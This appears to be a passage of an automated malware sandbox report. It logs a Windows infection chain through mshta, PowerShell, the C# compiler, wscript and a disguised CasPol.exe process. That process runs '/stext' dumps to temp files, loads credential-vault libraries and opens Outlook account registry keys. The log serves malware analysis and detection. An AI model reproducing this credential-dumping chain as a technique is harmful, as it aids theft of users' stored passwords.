                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\lciocgmukyzvv"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\lciocgmukyzvv"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\nwvgdqxnygriykln"Jump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: pstorec.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wldp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: pstorec.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: msasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: msasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wldp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: msasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                        Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000007.00000002.2116447936.00000000070BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2115527740.0000000006C20000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000007.00000002.2116447936.00000000070BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2115527740.0000000006C20000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000007.00000002.2116447936.00000000070BA000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.emitiinstructionoperandresolverieigdnlib.utilslazylist`1iaibdnlib.dotnetpropertyattributesicdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamixiydnlib.dotnetclasssigizdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionitiuelemequalitycompareriviwipiqdnlib.dotnet.mdrawpropertyptrrowirisdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcedn